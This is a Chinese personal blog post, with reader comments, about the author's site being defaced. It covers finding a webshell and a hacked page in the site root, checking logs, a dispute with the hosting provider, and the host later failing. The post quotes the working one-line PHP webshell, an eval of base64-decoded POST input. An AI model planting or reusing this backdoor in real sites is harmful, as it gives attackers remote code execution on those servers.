被人挂了页子

昨天倒腾网站的时候,发现根目录有奇怪的文件夹,一个fans.php一个gh.html,当时就尿了。。。
文件都没删,只是一句话的php标签删掉了,页子的图片链接删掉了


查了查最后修改时间前后的原始访问log,什么都没查到,也就是说文件出现的时候cpanel的log里什么都没记录,其实到这里应该就知道是服务器出问题了的,没想太多,就接着查。

  • fans.php的一句话,可以在国内某论坛查到原型
    $mujj=$_POST['RRRR'];if($mujj!=''){$xsser=base64_decode($_POST['z0']);@eval("\$safedg=$xsser;");}
  • 查fans.php的访问记录,查不到
  • 查gh.html的访问记录,查到的都是外国ip
  • 查留言里有没有xss,没查到
  • 访问记录查xss,查到了一个尝试在serach参数跨站的记录,可是时间对不上,在文件中搜索对应语句找不到
  • 下载整站备份,用vscode查关键字有没有其他隐藏shell,没找到@@当时我是蒙比的@@

在千里码群里找到了elf,结果发现应该是服务器被搞了
www.zone-h.org/archive/ip=122.10.90.178

这下我就放心了,因为我也无能为力啊,把程序和数据库down了一份,愿意怎么搞怎么搞吧,我备份好了等运营商补窟窿


与空间商“技术人员”的对话

我:

可以看到我当前所在主机大量网站存在相同黑页
http://www.zone-h.org/archive/ip=122.10.90.178

我于昨天发现根目录存在木马文件和黑页
名字为
https://moozik.cn/fans.php 最后修改日期2017-04-28 17:51
https://moozik.cn/gh.html 最后修改日期2017-4-24 04:37

但是去cpanel查看日期前后访问记录,发现完全没有记录,而且fans.php一次访问记录也没有

请检查服务器补丁情况,和网段内异常主机,多谢!多谢!


技术人员:

您好
:)
你网站被入侵
如果 你网站只是放个index.html单页 你可以看看
会被入侵么。
用户和用户之间 都是 suphp 独立的权限。
服务器没有任何安全问题。
你自己可以通过 360网站扫描检查工具。


我:
我麻烦你看看那个链接,同一天同一个ip上的不同站点,用着不同程序的20个站都被挂了相同的gh.html页面,你跟我说是我一个个例??

那你告诉我为什么那个文件的最后访问时间前后cpanel里的log根本就没有访问记录
那就说明根本不是从php这里改的文件

我不是在质疑你们的服务器不安全,也没有兴师问罪,只是想请你们本着为客户负责的精神检查一下,有那么难吗


后续

2017-05-02
一个朋友在我的推荐下用了我所用的主机,然而今天整个主机挂了,没错,我反查了一下,挂了27个域名的主机,ping不通,所有网站打不开。
QQ截图20170502174527.jpg

具体这个错误代表了什么我不是特别清楚,看看大牛怎么说。

最后修改:2018 年 02 月 28 日 05 : 40 PM

9 条评论

  1. 小F

    刚才才看到朋友说她网站被黑了,最近是怎么了⌇●﹏●⌇

    1. moozik
      @小F

      可能是因为某些特别吊的黑客组织被黑了,然后泄露出来的很多牛逼的工具搞的

  2. 苏格

    现在主机商一般的防御应该都挺强大的,这种情况真没遇见过,能说一下这是哪家服务商吗

    1. moozik
      @苏格

      cefhost.cn,其实用着还不错的,速度也挺快,但是这次是真的服务器有问题

  3. 小F

    这个主机商的回复还真……让人不舒服啊= =

    1. moozik
      @小F

      讲道理人家不听呢,就很气

  4. April's Blog

    不然老出事咋办

  5. April's Blog

    你需要一台vps 23333

    1. moozik
      @April's Blog

      跟朋友合伙买的阿里云,他是搞C#的,就用了windows,被勒索了,幸好里面没放什么东西,用vps事更多吧

发表评论